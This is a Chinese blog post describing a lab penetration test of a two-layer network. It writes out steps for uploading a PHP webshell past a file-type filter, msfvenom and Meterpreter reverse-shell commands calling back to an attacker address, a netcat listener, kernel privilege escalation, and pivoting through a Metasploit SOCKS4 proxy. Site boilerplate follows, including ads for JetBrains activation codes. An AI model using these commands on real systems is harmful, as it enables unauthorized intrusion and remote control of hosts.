socks4代理网络渗透测试实验

socks4代理网络渗透测试实验实验目的:利用2级代理功能对3层网络进行渗透测试靶机ubantu192.168.31.207192.168.1.129ubantu192.168.1.100192.168.2.10windows2009192.168.2.100192.168.首先访问192.1…

大家好,又见面了,我是你们的朋友全栈君。

            实验目的:利用代理功能对2层网络进行渗透
  测试靶机  ubantu 192.168.31.207  192.168.1.129
                  ubantu  192.168.1.100 

首先访问192.168.31.207
socks4代理网络渗透测试实验
一个简单得上传界面,这个界面做了文件类型的检测,直接上传是不行的,我们选择一句话木马,然后抓包修改文件类型,将
socks4代理网络渗透测试实验
改为socks4代理网络渗透测试实验
放包就上传成功了
socks4代理网络渗透测试实验
菜刀连接文件地址
socks4代理网络渗透测试实验
kali打开msf控制台,设置模块exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.31.43
set LPORT 8888
socks4代理网络渗透测试实验利用msfvenom生成elf木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.43 LPORT=8888 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >1.elf
利用菜刀上传php大马,并将生成的elf木马上传到目标机
进入大马进行反弹shell提权
kali本地监听12388端口 nc -lvvp 12388
socks4代理网络渗透测试实验
大马进行反弹shell
socks4代理网络渗透测试实验
反弹成功
socks4代理网络渗透测试实验uname -a 查看内核版本 并对上传对应的提权脚本进行提权 我用的是3.3.13内核的脚本
gcc shell.c -o shell
./shell
提权成功
socks4代理网络渗透测试实验我们给上传的elf木马权限并执行
chmod 777 1.elf
./elf
socks4代理网络渗透测试实验成功获得一个会话连接
socks4代理网络渗透测试实验添加一个路由 run autoroute -s 192.168.1.0/24
socks4代理网络渗透测试实验
本地设置socks4代理
use auxiliary/server/socks4a
set SRVPORT 9999
开启新的终端 编辑 vim /etc/proxychains.conf
socks4代理网络渗透测试实验将设置的socks4添加进末尾
代理打开firefox
socks4代理网络渗透测试实验
访问192.168.1.100
socks4代理网络渗透测试实验弱口令登陆后台,在设置处添加可以上传的文件类型 其他格式添加php,PHP,php3
socks4代理网络渗透测试实验
添加新文章上传php大马
socks4代理网络渗透测试实验直接拖拽成功上传后,可以查看路径,直接访问地址
socks4代理网络渗透测试实验由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具,如regerog+proxifier,regeorg+proxychains等相对稳定工具,当然如果自己有公网ip的话,还可以使用端口转发工具,这里就不赘述了
以上操作仅供大家学习参考使用,

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/147667.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • 用html设计一个静态网页_学生个人静态网页制作模板

    用html设计一个静态网页_学生个人静态网页制作模板用HTML和CSS制作简单的静态网页(小米商城)网页效果如下:代码如下(第一次写静态网页,中间css代码和html代码没有分离,所以代码可能有点乱还请见谅)1、css代码 /*——————————————–01———————————————————–*/ *{ margin:0; padding:0; } /*清除标

  • Java线程池参数分析「建议收藏」

    Java线程池参数分析「建议收藏」线程池组成创建线程池创建线程池通过Executors的工厂方法来创建线程池实例。实际上Executors创建的线程池实例最终都是通过实例化配置不同参数的ThreadPoolExecutor对象。 publicstaticExecutorServicenewFixedThreadPool(intnThreads){returnnewThreadPoolEx…

  • 基于单片机的八路抢答器设计论文_抢答器的程序流程图

    基于单片机的八路抢答器设计论文_抢答器的程序流程图文末下载完整资料1.1八路扫描式抢答器的概述  本文介绍的八路数显抢答器具有电路简单、成本较低、操作方便、灵敏可靠等优点,经使用效果良好,具有较高的推广价值。无线遥控抢答器,它由8个发射器和1个接收器组成,可用于8组或8组以下的智力竞赛中。比赛前,将参赛组从0至7编号,每组发给对应的一个发射器。将接收器放于各组中央或前方。主持人按一下启动键后,抢答开始。此后,哪一组最先按下发射器上的抢答键,接收器就立即显示该组的组号并锁定,同时发出3次清脆的“叮咚”声。以后,按下任何一路抢答键均不起反映。只有主

    2022年10月20日
  • idea 2021激活码[在线序列号][通俗易懂]

    idea 2021激活码[在线序列号],https://javaforall.cn/100143.html。详细ieda激活码不妨到全栈程序员必看教程网一起来了解一下吧!

  • win10 ie兼容性视图_ie11浏览器怎么设置兼容性视图

    win10 ie兼容性视图_ie11浏览器怎么设置兼容性视图查阅了大量资料,暂时没有在edge中设置ie兼容性视图的。不过可以在“程序”中安装IE11方法一:(看这样设置可以吗?若不可以,看方法二安装IE11)方法二:或许以后会出现相关插件的。…

  • 做一个“代码模块”交易的网站

    做一个“代码模块”交易的网站

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号